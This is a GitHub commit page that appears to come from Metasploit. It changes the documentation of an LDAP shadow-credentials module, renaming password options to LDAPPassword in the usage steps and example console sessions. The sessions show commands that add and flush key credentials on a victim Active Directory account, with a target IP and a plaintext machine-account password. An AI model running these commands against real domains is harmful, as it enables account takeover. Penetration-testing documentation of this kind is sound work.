Skip to content

Commit 5ae52f2

Browse files
zeroSteinerzeroSteiner
committed
Switch to LDAPPassword too
1 parent 9ac55c3 commit 5ae52f2

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

documentation/modules/auxiliary/admin/ldap/shadow_credentials.md

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -65,7 +65,7 @@ PropagationFlags : None
6565
## Module usage
6666
1. `use auxiliary/admin/ldap/shadow_credentials`
6767
2. Set the `RHOST` value to a target domain controller
68-
3. Set the `USERNAME` and `PASSWORD` information to an account with the necessary privileges
68+
3. Set the `LDAPUsername` and `LDAPPassword` information to an account with the necessary privileges
6969
4. Set the `TARGET_USER` to the victim account
7070
5. Use the `ADD` action to add a credential entry to the victim account
7171

@@ -154,8 +154,8 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > set domain MSF.LOCAL
154154
domain => MSF.LOCAL
155155
msf6 auxiliary(admin/ldap/shadow_credentials) > set ldapusername sandy
156156
ldapusername => sandy
157-
msf6 auxiliary(admin/ldap/shadow_credentials) > set password Password1!
158-
password => Password1!
157+
msf6 auxiliary(admin/ldap/shadow_credentials) > set ldappassword Password1!
158+
ldappassword => Password1!
159159
msf6 auxiliary(admin/ldap/shadow_credentials) > set target_user victim
160160
target_user => victim
161161
msf6 auxiliary(admin/ldap/shadow_credentials) > set action add
@@ -233,7 +233,7 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapuser
233233
Note, however, that attempting to add a second credential will fail under these circumstances:
234234

235235
```msf
236-
msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
236+
msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ ldappassword=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
237237
[*] Running module against 20.92.148.129
238238
239239
[+] Successfully bound to the LDAP server!
@@ -253,7 +253,7 @@ for any legitimate user relying on the existing value.
253253
```msf
254254
msf6 auxiliary(admin/ldap/shadow_credentials) > set action flush
255255
action => flush
256-
msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
256+
msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ ldappassword=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
257257
[*] Running module against 20.92.148.129
258258
259259
[+] Successfully bound to the LDAP server!
@@ -264,7 +264,7 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapuser
264264
[*] Auxiliary module execution completed
265265
msf6 auxiliary(admin/ldap/shadow_credentials) > set action add
266266
action => add
267-
msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
267+
msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ ldappassword=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
268268
[*] Running module against 20.92.148.129
269269
270270
[+] Successfully bound to the LDAP server!

0 commit comments

Comments
 (0)